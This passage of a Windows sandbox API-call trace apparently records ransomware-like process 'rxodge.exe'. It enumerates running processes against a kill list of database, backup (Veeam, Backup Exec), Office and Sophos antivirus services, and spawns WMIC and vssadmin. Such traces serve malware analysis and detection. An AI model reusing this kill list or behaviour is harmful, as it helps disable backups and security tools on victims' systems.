lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0141.708] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0141.708] StrStrIA (lpFirst="dllhost.exe", lpSrch="sql") returned 0x0 [0141.708] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0141.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0141.709] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3583b30 [0141.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3583b30, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0141.709] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0141.709] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0141.709] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0141.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0141.711] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3583b48 [0141.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3583b48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0141.711] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0141.711] StrStrIA (lpFirst="UsoClient.exe", lpSrch="sql") returned 0x0 [0141.711] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0141.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0141.712] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3596aa8 [0141.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3596aa8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0141.817] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0141.817] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="sql") returned 0x0 [0141.817] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0141.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0141.818] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3596d88 [0141.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3596d88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0141.818] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0141.818] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="sql") returned 0x0 [0141.818] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0141.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0141.820] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x35857b0 [0141.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x35857b0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0141.820] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0141.820] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="sql") returned 0x0 [0141.820] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0141.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.821] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583458 [0141.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3583458, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0141.821] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0141.821] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0141.821] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0141.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.823] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583530 [0141.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3583530, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0141.823] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0141.823] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0141.823] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0141.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.824] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583560 [0141.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3583560, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0141.824] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0141.824] StrStrIA (lpFirst="rxodge.exe", lpSrch="sql") returned 0x0 [0141.824] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0141.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.825] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583470 [0141.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3583470, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0141.826] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0141.826] StrStrIA (lpFirst="sppsvc.exe", lpSrch="sql") returned 0x0 [0141.826] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0141.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0141.827] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596c88 [0141.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x3596c88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0141.827] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0141.827] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="sql") returned 0x0 [0141.827] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0141.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.828] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583950 [0141.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x3583950, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0141.829] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0141.829] StrStrIA (lpFirst="TiWorker.exe", lpSrch="sql") returned 0x0 [0141.829] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x11dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0141.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WMIC.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.830] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35838f0 [0141.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WMIC.exe", cchWideChar=-1, lpMultiByteStr=0x35838f0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WMIC.exe", lpUsedDefaultChar=0x0) returned 9 [0141.830] lstrcpyA (in: lpString1=0x567fabc, lpString2="WMIC.exe" | out: lpString1="WMIC.exe") returned="WMIC.exe" [0141.830] StrStrIA (lpFirst="WMIC.exe", lpSrch="sql") returned 0x0 [0141.830] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x11dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0141.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vssadmin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.831] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35839f8 [0141.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vssadmin.exe", cchWideChar=-1, lpMultiByteStr=0x35839f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin.exe", lpUsedDefaultChar=0x0) returned 13 [0141.831] lstrcpyA (in: lpString1=0x567fabc, lpString2="vssadmin.exe" | out: lpString1="vssadmin.exe") returned="vssadmin.exe" [0141.831] StrStrIA (lpFirst="vssadmin.exe", lpSrch="sql") returned 0x0 [0141.831] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x380, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0141.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.832] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583aa0 [0141.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3583aa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0141.832] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0141.832] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0141.833] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x7e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0141.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.834] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583908 [0141.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3583908, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0141.834] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0141.834] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0141.834] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x7e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0141.835] CloseHandle (hObject=0x370) returned 1 [0141.835] SetEvent (hEvent=0x210) returned 1 [0141.835] Sleep (dwMilliseconds=0x2710) [0152.280] lstrcpyA (in: lpString1=0x567f090, lpString2="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v" | out: lpString1="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v") returned="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v" [0152.280] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x374 [0152.316] Process32FirstW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0152.318] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3596bc8 [0152.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3596bc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0152.318] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0152.318] StrStrIA (lpFirst="[System Process]", lpSrch="sql") returned 0x0 [0152.318] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0152.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0152.319] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x357e2e8 [0152.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x357e2e8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0152.320] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0152.320] StrStrIA (lpFirst="System", lpSrch="sql") returned 0x0 [0152.320] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0152.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0152.321] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3583a70 [0152.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3583a70, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0152.322] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0152.322] StrStrIA (lpFirst="smss.exe", lpSrch="sql") returned 0x0 [0152.322] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0152.323] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3583968 [0152.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3583968, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0152.323] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0152.323] StrStrIA (lpFirst="csrss.exe", lpSrch="sql") returned 0x0 [0152.323] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0152.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.325] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583bc0 [0152.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3583bc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0152.325] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0152.325] StrStrIA (lpFirst="wininit.exe", lpSrch="sql") returned 0x0 [0152.325] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0152.326] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3583b60 [0152.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3583b60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0152.735] lstrcpyA (in: lpString1=0x567fabc, 